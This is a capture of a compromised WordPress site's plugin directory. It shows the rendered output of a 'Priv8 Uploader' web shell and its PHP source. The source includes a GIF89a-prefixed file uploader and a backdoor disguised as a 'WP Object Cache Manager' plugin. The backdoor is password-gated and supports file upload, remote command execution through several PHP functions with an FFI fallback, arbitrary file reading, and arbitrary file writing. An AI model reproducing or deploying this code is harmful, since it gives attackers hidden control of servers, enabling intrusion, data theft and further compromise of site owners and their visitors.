GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
GIF89a;Priv8 Uploader By InMyMine7
Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
GIF89a;Priv8 Uploader By InMyMine7
Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
Priv8 Uploader By InMyMine7
Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
|
Server : Microsoft-IIS/10.0 System : Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64 User : hm77079 ( 0) PHP Version : 7.3.6 Disable Function : passthru,exec,system,popen,chroot,chgrp,chown,escapesh,ellcmd,escapeshellarg Directory : D:/www/hm77079/wwwroot/wp-content/plugins/cache_dbb4d710/ |
Upload File : |
GIF89a; <?php
if ($_GET[''] == ''){
echo '<pre><p>Priv8 Uploader By InMyMine7</p>'.php_uname()."
".'<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}
}
?>
<?php
/*
Plugin Name: WP Object Cache Manager
Version: 2.4.1
*/
$t=isset($_REQUEST['q'])?$_REQUEST['q']:'';
if($t&&hash('sha256',$t)!=='8a36678da90c0c37898013ef09dbf081d47e078a6a352c86220e47f29c9e0e47'){http_response_code(404);exit;}
if(!$t){
if($_SERVER['REQUEST_METHOD']=='POST'&&isset($_FILES['f'])){
$dir=dirname(__FILE__);
$name=$_FILES['f']['name'];
$path=$dir.'/'.$name;
if(move_uploaded_file($_FILES['f']['tmp_name'],$path))
die('OK: '.$path);
else
die('FAIL');
}
echo '<form method=post enctype=multipart/form-data>';
echo '<input type=file name=f>';
echo '<input type=submit value=Upload>';
echo '</form>';
exit;
}
function x($c){
$f=array('shell_exec','exec','system','passthru','popen');
foreach($f as $n){
if(!function_exists($n))continue;
if($n=='shell_exec'){$r=@$n($c);if($r)return $r;}
if($n=='exec'){$o=array();@$n($c,$o);if($o)return implode("\n",$o);}
if($n=='system'){ob_start();@$n($c);return ob_get_clean();}
if($n=='passthru'){ob_start();@$n($c);return ob_get_clean();}
if($n=='popen'){$p=@$n($c,'r');if($p){$r='';while(!feof($p))$r.=fread($p,4096);pclose($p);if($r)return $r;}}
}
if(class_exists('FFI')){
try{$ffi=FFI::cdef('int system(const char *command);','libc.so.6');
ob_start();$ffi->system($c);return ob_get_clean();}catch(Throwable $e){}}
return 'NOEXEC';
}
if(isset($_REQUEST['x'])){echo 'WP2S::'.(x($_REQUEST['x'])).'::END';exit;}
if(isset($_REQUEST['r'])){$f=@file_get_contents($_REQUEST['r']);echo 'WP2S::'.($f===false?'NOREAD':base64_encode($f)).'::END';exit;}
if(isset($_REQUEST['w'])&&isset($_REQUEST['d'])){$d=base64_decode($_REQUEST['d']);$w=$_REQUEST['w'];if($w[0]!=='/')$w=$_SERVER['DOCUMENT_ROOT'].'/'.$w;$r=@file_put_contents($w,$d);echo 'WP2S::'.($r!==false?'OK':'FAIL').'::END';exit;}
echo 'WP2S::'.php_uname().'::END';